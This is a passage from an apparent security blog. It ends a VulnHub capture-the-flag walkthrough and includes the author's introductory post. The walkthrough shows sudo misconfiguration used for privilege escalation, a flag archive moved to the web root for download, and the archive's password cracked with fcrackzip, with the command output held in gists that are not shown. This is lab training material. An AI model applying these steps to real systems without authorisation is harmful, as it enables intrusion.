<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIexJWkAswhfxkxvipdTan1eQwz27-xgUKXJiDi4g5QMrFtDgSdHep8ZcpqFBtx6E9ely1JkRQDqgtwqFdWr9RY_ZUM42HB78y8sC_ulE832_sI797F_W9xC5dU7GuoJx3y3sZU6mVKv8/s1600/facepalm.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIexJWkAswhfxkxvipdTan1eQwz27-xgUKXJiDi4g5QMrFtDgSdHep8ZcpqFBtx6E9ely1JkRQDqgtwqFdWr9RY_ZUM42HB78y8sC_ulE832_sI797F_W9xC5dU7GuoJx3y3sZU6mVKv8/s400/facepalm.jpg" /></a></div>
<br />
<br />
Can we get lucky with sudo? sudo -l results in the following:
<br />
<script src="https://gist.github.com/ByteReaper/ad45f0328d18aa98e7fd455b715270c5.js"></script>
<br />
rhubbard has the permissions to run any and everything as root. Lets get our root permissions using sudo su<br />
<script src="https://gist.github.com/ByteReaper/6371b206e2a3a3ded0e1ed90710b0f0b.js"></script>
<br />
Lets get our flag.<br />
<script src="https://gist.github.com/ByteReaper/d94e80490d84827b84509ae3b5551391.js"></script>
I forgot <a href="https://twitter.com/@knightmare2600" target="_blank">@knightmare2600</a> said we need to work to get the flag...<br />
As you can see we are presented with a hint.gif and a hidden folder called .commedore64. I will skip the hint for now and traverse the .commodore64 path.<br />
<script src="https://gist.github.com/ByteReaper/0adef943968e10ba0bc9916dd7edc0f5.js"></script><br />
<br />
using CP i was able to copy the flag.zip to /var/www/html and get the zip file on my local.
Of course it is password protected so using fcrackzip we get the following output
<br />
<script src="https://gist.github.com/ByteReaper/42fad98b872addb15a583e51b3b5f7aa.js"></script><br />
<br />
Sweet so we have a flag.d64 now which can be run with an emulator.<br />
<br />
NOTE: I am lazy ATM so i will not attempt to get the emulator working. but doing a strings on the file tells me everything i need to know.<br />
<br />
<script src="https://gist.github.com/ByteReaper/27a6852668dcbc8cb9fd295b917565fc.js"></script><br />
<br />
<br />
Awesome VM from <a href="https://twitter.com/@knightmare2600" target="_blank">@knightmare2600</a> and a special thanks to <a href="https://vulnhub.com/" target="_blank">VulnHub</a> for hosting it. ByteReaperhttp://www.blogger.com/profile/05483546627343627430noreply@blogger.com0tag:blogger.com,1999:blog-393700287629243984.post-83736927119901803752016-06-06T13:42:00.000-04:002016-06-06T13:42:16.674-04:00Hello W0rld?This is my obligatory hello world post.<br />
<br />
<script alt="test" src="https://gist.github.com/ByteReaper/2ae735d3f079b020f44de827442509eb.js"></script>So, who am i. I'm someone with security in mind...or at least lack of security. I love doing hacking challenges hosted by <a href="https://www.vulnhub.com/" target="_blank">Vulnhub</a>.<br />
<br />
I would personally like to thank Vulnhub for hosting, and all of the developers that create these challenges. Without you in my life...well...i would be very bored. I would also like to give a shout out to <a href="https://twiter.com/g0tmi1k" target="_blank">@g0tmi1k</a> - <a href="https://blog.g0tmi1k.com/" target="_blank">Blog</a>, <a href="https://twitter.com/g0blinResearch" target="_blank">@G0blinResearch</a> - <a href="https://research.g0blin.co.uk/" target="_blank">Blog</a>, and all the others that i do not have the time to list. If it were not for you researchers i would not be progressing the way i am.
<br />
<br />
Thank you, keep the lulz coming.
<br />
ByteReaper
<br />
ByteReaperhttp://www.blogger.com/profile/05483546627343627430noreply@blogger.com0